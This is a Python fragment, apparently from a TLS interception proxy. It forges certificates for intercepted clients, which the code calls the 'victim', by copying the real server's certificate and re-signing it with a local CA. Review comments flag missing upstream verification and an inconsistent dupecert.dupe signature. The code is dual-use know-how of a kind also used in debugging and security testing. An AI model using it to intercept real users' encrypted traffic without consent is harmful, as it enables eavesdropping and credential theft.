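def dupe_socket_cert(soc, ca):
    """Copy the peer certificate of ``soc`` and sign the copy with ``ca``.

    The certificate is read from the socket as DER and parsed directly as
    ASN.1. The earlier DER -> PEM -> parse round trip needed a string patch
    to put a newline before the ``-----END CERTIFICATE-----`` footer, and
    that patch adds a stray blank line whenever the PEM is already well
    formed. Parsing the DER bytes avoids the text step entirely.

    Args:
        soc: connected TLS socket exposing ``getpeercert`` (presumably an
            ``ssl.SSLSocket`` -- confirm against the callers).
        ca: signing material passed unchanged to ``dupecert.sign``.

    Returns:
        The object produced by ``dupecert.dupe``, after ``dupecert.sign``
        has been applied to it.
    """
    # binary_form=True asks for the raw DER encoding. For ssl.SSLSocket this
    # is None when the peer sent no certificate, and the bytes are returned
    # whether or not the certificate was validated, so nothing here
    # establishes that the copied certificate is trustworthy.
    peer_der = soc.getpeercert(True)
    peer_cert = crypto.load_certificate(crypto.FILETYPE_ASN1, peer_der)

    # NOTE(review): dupecert.dupe takes one argument here but three
    # (ca cert, ca key, peer cert) in _start_mitm -- confirm which signature
    # the dupecert module actually provides.
    duplicate = dupecert.dupe(peer_cert)
    dupecert.sign(ca, duplicate)
    return duplicate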
def _start_mitm(self):
    """Run both TLS handshakes of the interception session, at most once.

    The upstream handshake runs first so the server's certificate is
    available. ``dupecert.dupe`` then derives a certificate/key pair from it
    using ``self.ca_cert`` and ``self.ca_key``, and that pair is presented
    on the client-facing connection. On success the two connections are
    stored on ``self.server`` and ``self.victim`` and ``self._started`` is
    set. Later calls do nothing.
    """
    if not self._started:
        # Client role towards the real server.
        upstream = SSL.Connection(self._mk_ctx(), self.server_plain)
        upstream.set_connect_state()
        upstream.do_handshake()

        # NOTE(review): nothing in this method checks the upstream chain or
        # hostname. Unless _mk_ctx enables verification, an invalid upstream
        # certificate is replaced by one chaining to the local CA, and the
        # client can no longer notice the problem -- confirm.
        forged_pair = dupecert.dupe(
            self.ca_cert,
            self.ca_key,
            upstream.get_peer_certificate(),
        )

        # Server role towards the intercepted client.
        downstream = SSL.Connection(
            self._mk_ctx(cert_pkey=forged_pair),
            self.victim_plain,
        )
        downstream.set_accept_state()
        downstream.do_handshake()

        # State is published only after both handshakes succeeded.
        self.server = upstream
        self.victim = downstream
        self._started = True